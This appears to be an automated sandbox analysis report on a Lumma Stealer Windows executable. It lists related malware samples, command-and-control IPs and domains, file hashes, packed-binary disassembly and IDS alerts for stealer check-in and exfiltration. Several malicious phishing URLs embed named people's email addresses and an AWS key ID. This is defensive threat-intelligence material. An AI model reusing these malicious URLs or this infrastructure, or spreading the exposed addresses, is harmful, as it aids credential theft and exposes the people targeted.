                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:08:36 | API Interceptor | 24x Sleep call for process: zLP3oiwG1g.exe modified
02:09:30 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.199.72 | 0HdDuWzp54.exe | Get hash | malicious | LummaC, Stealc | Browse
172.67.199.72 | NE4jxHLxXJ.exe | Get hash | malicious | LummaC, Stealc | Browse
172.67.199.72 | U8mbM8r793.exe | Get hash | malicious | LummaC, Stealc | Browse
185.166.143.48 | http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt | Get hash | malicious | Unknown | Browse | bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
104.21.36.201 | Yh6fS6qfTE.exe | Get hash | malicious | LummaC | Browse
104.21.36.201 | ABnDy7rLFS.exe | Get hash | malicious | LummaC, Stealc | Browse
104.21.36.201 | skIYOAOzvU.exe | Get hash | malicious | LummaC | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
observerfry.lat | 0HdDuWzp54.exe | Get hash | malicious | LummaC, Stealc | Browse | 172.67.199.72
observerfry.lat | Yh6fS6qfTE.exe | Get hash | malicious | LummaC | Browse | 104.21.36.201
observerfry.lat | NE4jxHLxXJ.exe | Get hash | malicious | LummaC, Stealc | Browse | 172.67.199.72
observerfry.lat | U8mbM8r793.exe | Get hash | malicious | LummaC, Stealc | Browse | 172.67.199.72
observerfry.lat | ABnDy7rLFS.exe | Get hash | malicious | LummaC, Stealc | Browse | 104.21.36.201
observerfry.lat | skIYOAOzvU.exe | Get hash | malicious | LummaC | Browse | 104.21.36.201
s3-w.us-east-1.amazonaws.com | Yh6fS6qfTE.exe | Get hash | malicious | LummaC | Browse | 52.217.18.140
s3-w.us-east-1.amazonaws.com | 5RjjCWZAVv.exe | Get hash | malicious | LummaC | Browse | 52.217.203.57
s3-w.us-east-1.amazonaws.com | TmmiCE5Ulm.exe | Get hash | malicious | LummaC | Browse | 3.5.16.86
s3-w.us-east-1.amazonaws.com | uLkHEqZ3u3.exe | Get hash | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | Browse | 16.182.37.145
s3-w.us-east-1.amazonaws.com | EI3TafelpV.exe | Get hash | malicious | LummaC | Browse | 52.216.41.233
s3-w.us-east-1.amazonaws.com | https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.uk | Get hash | malicious | Fake Captcha | Browse | 52.217.128.241
s3-w.us-east-1.amazonaws.com | https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.uk | Get hash | malicious | Fake Captcha | Browse | 52.216.142.68
s3-w.us-east-1.amazonaws.com | https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6 | Get hash | malicious | Unknown | Browse | 54.231.135.57
s3-w.us-east-1.amazonaws.com | F.O Pump Istek,Docx.bat | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | 54.231.224.185
s3-w.us-east-1.amazonaws.com | D.G Governor Istek,Docx.exe | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | 52.217.32.148
bitbucket.org | Yh6fS6qfTE.exe | Get hash | malicious | LummaC | Browse | 185.166.143.50
bitbucket.org | 5RjjCWZAVv.exe | Get hash | malicious | LummaC | Browse | 185.166.143.49
bitbucket.org | TmmiCE5Ulm.exe | Get hash | malicious | LummaC | Browse | 185.166.143.49
bitbucket.org | uLkHEqZ3u3.exe | Get hash | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | Browse | 185.166.143.48
bitbucket.org | EI3TafelpV.exe | Get hash | malicious | LummaC | Browse | 185.166.143.49
bitbucket.org | F.O Pump Istek,Docx.bat | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | 185.166.143.48
bitbucket.org | D.G Governor Istek,Docx.exe | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | 185.166.143.49
bitbucket.org | credit.js | Get hash | malicious | PureLog Stealer, RHADAMANTHYS | Browse | 185.166.143.48
bitbucket.org | fGZLZhXIt1.bat | Get hash | malicious | Unknown | Browse | 185.166.143.48
bitbucket.org | V7giEUv6Ee.bat | Get hash | malicious | Unknown | Browse | 185.166.143.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | 0HdDuWzp54.exe | Get hash | malicious | LummaC, Stealc | Browse | 172.67.199.72
CLOUDFLARENETUS | Yh6fS6qfTE.exe | Get hash | malicious | LummaC | Browse | 104.21.36.201
CLOUDFLARENETUS | NE4jxHLxXJ.exe | Get hash | malicious | LummaC, Stealc | Browse | 172.67.199.72
CLOUDFLARENETUS | U8mbM8r793.exe | Get hash | malicious | LummaC, Stealc | Browse | 172.67.199.72
CLOUDFLARENETUS | ABnDy7rLFS.exe | Get hash | malicious | LummaC, Stealc | Browse | 104.21.36.201
CLOUDFLARENETUS | skIYOAOzvU.exe | Get hash | malicious | LummaC | Browse | 104.21.36.201
CLOUDFLARENETUS | NfwBtCx5PR.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
CLOUDFLARENETUS | pJRiqnTih0.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
CLOUDFLARENETUS | xxLuwS60RS.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
CLOUDFLARENETUS | schost.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.6.116
AMAZON-02US | Yh6fS6qfTE.exe | Get hash | malicious | LummaC | Browse | 52.217.18.140
AMAZON-02US | armv6l.elf | Get hash | malicious | Unknown | Browse | 54.203.164.5
AMAZON-02US | 5RjjCWZAVv.exe | Get hash | malicious | LummaC | Browse | 52.217.203.57
AMAZON-02US | TmmiCE5Ulm.exe | Get hash | malicious | LummaC | Browse | 185.166.143.49
AMAZON-02US | uLkHEqZ3u3.exe | Get hash | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | Browse | 185.166.143.48
AMAZON-02US | EI3TafelpV.exe | Get hash | malicious | LummaC | Browse | 185.166.143.49
AMAZON-02US | mips.elf | Get hash | malicious | Unknown | Browse | 54.171.230.55
AMAZON-02US | trZG6pItZj.exe | Get hash | malicious | Vidar | Browse | 108.139.47.92
AMAZON-02US | https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLw | Get hash | malicious | Unknown | Browse | 65.9.112.70
AMAZON-02US | https://staging.effimate.toyo.ai-powered-services.com/ | Get hash | malicious | Unknown | Browse | 108.158.71.175
                                                                                                                                                                              https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 65.9.112.70
                                                                                                                                                                              https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 108.158.71.175
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
  0HdDuWzp54.exe | malicious | LummaC, Stealc
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  Yh6fS6qfTE.exe | malicious | LummaC
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  NE4jxHLxXJ.exe | malicious | LummaC, Stealc
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  OGBLsboKIF.exe | malicious | LummaC
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  U8mbM8r793.exe | malicious | LummaC, Stealc
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  ABnDy7rLFS.exe | malicious | LummaC, Stealc
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  skIYOAOzvU.exe | malicious | LummaC
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  NfwBtCx5PR.exe | malicious | LummaC
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  spoolsv.COM.exe | malicious | DBatLoader
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
  pJRiqnTih0.exe | malicious | LummaC
    • 104.21.36.201
    • 172.67.199.72
    • 185.166.143.48
    • 52.217.67.100
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0425242073571763
Encrypted: false
SSDEEP: 96:vqFDfXM34nNZsnYhroI7JfpQXIDcQvc6QcEVcw3cE/heu+HbHg/8BRTf3Oy1oVa2:ilNZA0BU/wjudxQfzuiFnZ24IO8OM
MD5: B93DA0D330BFBD76594171C10B4CB013
SHA1: F240D6AFE5C004ED12A2C76010ECE667E4EDDC16
SHA-256: B3B95EA5DE8FD84C0348E755909FD9F260A7705A1E2F713574FA62A0FEC32907
SHA-512: 0F9CF42A2431E5683BE6FDAC87552C8EEBFB1A1317F8A8EECC10ED26A16E2FB17131B48D97ED9F3C8DF5C1BD51E21B44473ACA0CAE06BB9444481EB32F41730F
Malicious: true
Reputation: low
                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.1.3.4.4.7.0.8.5.4.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.1.3.4.5.4.5.8.5.4.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.c.0.f.c.9.d.-.f.e.c.3.-.4.a.4.7.-.a.5.f.3.-.2.9.0.d.7.8.e.8.5.0.6.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.d.f.9.8.c.f.-.d.4.a.7.-.4.9.f.0.-.8.f.2.4.-.7.0.9.a.6.b.b.a.a.4.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.L.P.3.o.i.w.G.1.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.8.4.-.0.0.0.1.-.0.0.1.3.-.a.5.2.0.-.8.d.7.9.0.9.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.b.7.0.5.0.6.f.c.8.c.d.4.f.b.c.f.6.d.b.f.3.0.3.d.d.9.d.8.9.e.f.0.0.0.0.f.f.f.f.!.0.0.0.0.4.0.3.3.e.d.1.d.e.b.6.3.9.2.2.a.6.f.7.3.a.3.5.2.0.4.d.b.4.2.5.f.e.0.d.3.b.5.5.9.!.z.L.P.3.o.i.w.G.1.g...e.x.e.....T.a.r.g.e.t.A.p.p.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Dec 23 07:09:04 2024, 0x1205a4 type
Category: dropped
Size (bytes): 297690
Entropy (8bit): 1.4616883427354084
Encrypted: false
SSDEEP: 768:vMBBud4V0PzNzFJGdKVx7qGJF+sCs78j9oD0m:ve2FH/mwT778GD0m
MD5: C86C110440210B809936AD4BEADB65BC
SHA1: 62CE826C39D247D7B96662867CA2BF1514017012
SHA-256: 4DD8C7E438DF539EC868837CB5BCED0428A4BE514A01BF10438928377CCD750D
SHA-512: 06E336260B351FD89E468447A1E396FA9627FB592FA654F573501E06E86A94BD26AC62DA308C00C991B1A9CFA71A536CBBE43C7C0F38AC0650D13A571038040B
Malicious: false
Reputation: low
                                                                                                                                                                              Preview:MDMP..a..... .........ig....................................D....'..........H...........`.......8...........T...........xL..b>...........)...........*..............................................................................eJ.......+......GenuineIntel............T...........o.ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8382
Entropy (8bit): 3.704614965580477
Encrypted: false
SSDEEP: 192:R6l7wVeJo96c6YWMPSUMgmfgIprD89b/Ssf81m:R6lXJa6c6Y/SUMgmfgR/Rfj
MD5: 9274641D31CEC413B5AEE4B598201D5F
SHA1: 439F1616730E9E39E28A2532978B711E0EB04739
SHA-256: 6C051F095646B2754CBFD8005D37D62E2998C8BB43FC187B8E5949A43DBD1F96
SHA-512: 43BF09323E4B9C3709FF74EEF55B931D90BFF5F6914E0C2C14ED28BA3898397FF5BF21057C3354AD36EA5224C8D4E39C0995B5904A1AD77A3024E7A72F306D8C
Malicious: false
Reputation: low
                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.0.0.<./.P.i.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4624
Entropy (8bit): 4.5036273149650885
Encrypted: false
SSDEEP: 48:cvIwWl8zsnMJg77aI9bwWpW8VYTYm8M4JNKcFBGT+q8T6rpTBzowd:uIjfnKI7pJ7VHJ0THp9zowd
MD5: 4D1562EDA9676FB9122379AE950DDD36
SHA1: 0873237188E2DC5E01BE5C15E5F5EDA70E9F84A8
SHA-256: D16F9E5E8D30774CF5173019760AAB2F3B97E7081AA9346852CF7AA26E4B0B6A
SHA-512: D39E1F357738789AE94C86A59A65CF37B83BC9C88465B042F3F6539B4ABA93883E3C0B74788E5BEF1F91627B12F6B5DCA1F6C124112A3BF51BFDFF7A3EB5DD28
Malicious: false
Reputation: low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643571" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.295978076121154
Encrypted: false
SSDEEP: 6144:w41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+rWmBMZJh1VjE:t1/YCW2AoQ0NiRWwMHrVg
MD5: B1DB8810161652B78E77A7D170C05360
SHA1: 74362D15CA3B82EBBD2C85089368A71C8498E653
SHA-256: 42E79B4CB61255D1B8AA40D0A19A30F6F5DAE3281D5C0BE1C87B53AE5924A885
SHA-512: E364D0CD05EEA3E2AF31E073AE219EF3C584A74E1A67695F85BD4149B73F5D10A3E87AAF35F68C56B9876E302AB582A2E1DF0C7A9636A15BBA4C5E69E418C669
Malicious: false
Reputation: low
                                                                                                                                                                              Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....U..............................................................................................................................................................................................................................................................................................................................................)O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.5726135493498505
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: zLP3oiwG1g.exe
File size: 2'994'688 bytes
MD5: ad848f9eed40c0533c28f2c521395df8
SHA1: 4033ed1deb63922a6f73a35204db425fe0d3b559
SHA256: 464199a09a215759b285df6462e2cbcfcecf601844c666da6e9de258a0a5d4e9
SHA512: 6b5545b1f038c8699bb919da3c035bb97ebce0de374e19d2b5de12f234be71c48562c2d5c6085e70926ed78a2ea7609b87521b967336d5b64d096d7afaf37364
SSDEEP: 49152:CXHlm2mehou699Jy+TubbJZ6IlNTNSflUE:m82meKuk9Jy+TOEIl/S
TLSH: 6ED54A5BB605B6DFE48A22785627CE82599D83FA47180CC3D82D74BBBD63CC111F6D28
                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................0...........@...........................0.....GX....@.................................T0..h..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x709000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007FC69CEEE01Ah
seto byte ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007FC69CEEE082h
push esi
dec edx
popad
je 00007FC69CEEE07Bh
push edx
dec esi
jc 00007FC69CEEE08Ah
cmp byte ptr [ebx], dh
push edx
jns 00007FC69CEEE057h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007FC69CEEE05Dh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007FC69CEEE067h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007FC69CEEE05Ch
dec eax
dec ebp
jo 00007FC69CEEE053h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007FC69CEEE060h
insd
jnc 00007FC69CEEE080h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007FC69CEEE068h
push edx
insb
js 00007FC69CEEE081h
outsb
inc ecx
jno 00007FC69CEEE062h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007FC69CEEE05Ch
dec ebx
js 00007FC69CEEE053h
jne 00007FC69CEEE041h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007FC69CEEE06Ch
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007FC69CEEE04Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007FC69CEEE083h
Name                                    Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT            0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT            0x53054          0x68          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE          0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION         0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY          0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC         0x531f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG             0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT         0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR         0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS               0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG       0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT      0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT               0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT      0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR    0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED          0x0              0x0
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| (unprintable name) | 0x1000 | 0x51000 | 0x24800 | 64bc49734a61d81402b396dd2ac23f0e | False | 0.9973311750856164 | data | 7.979217064192899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x52000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| hzyqibdm | 0x54000 | 0x2b4000 | 0x2b3200 | bde9a2d008a7a2898ba5440f40d8aa09 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| ehrkmnwb | 0x308000 | 0x1000 | 0x400 | 7d2fc17d416ac50b5f876f4e66a9bd18 | False | 0.828125 | data | 6.453666103595028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x309000 | 0x3000 | 0x2200 | 3071aff07a324d9a2331ed5786438138 | False | 0.35466452205882354 | DOS executable (COM) | 3.888782406653298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-23T08:08:36.728457+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49713 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:37.462740+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49713 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:37.462740+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49713 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:38.709148+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49719 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:39.480311+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.10 | 49719 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:39.480311+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49719 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:41.383464+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49725 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:44.094130+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49731 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:46.420577+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49737 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:49.010535+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49743 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:51.511498+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49751 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:51.521970+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.10 | 49751 | 104.21.36.201 | 443 | TCP |
| 2024-12-23T08:08:56.654674+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49768 | 172.67.199.72 | 443 | TCP |
| 2024-12-23T08:08:57.453439+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49768 | 172.67.199.72 | 443 | TCP |
| 2024-12-23T08:08:59.223387+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49774 | 185.166.143.48 | 443 | TCP |
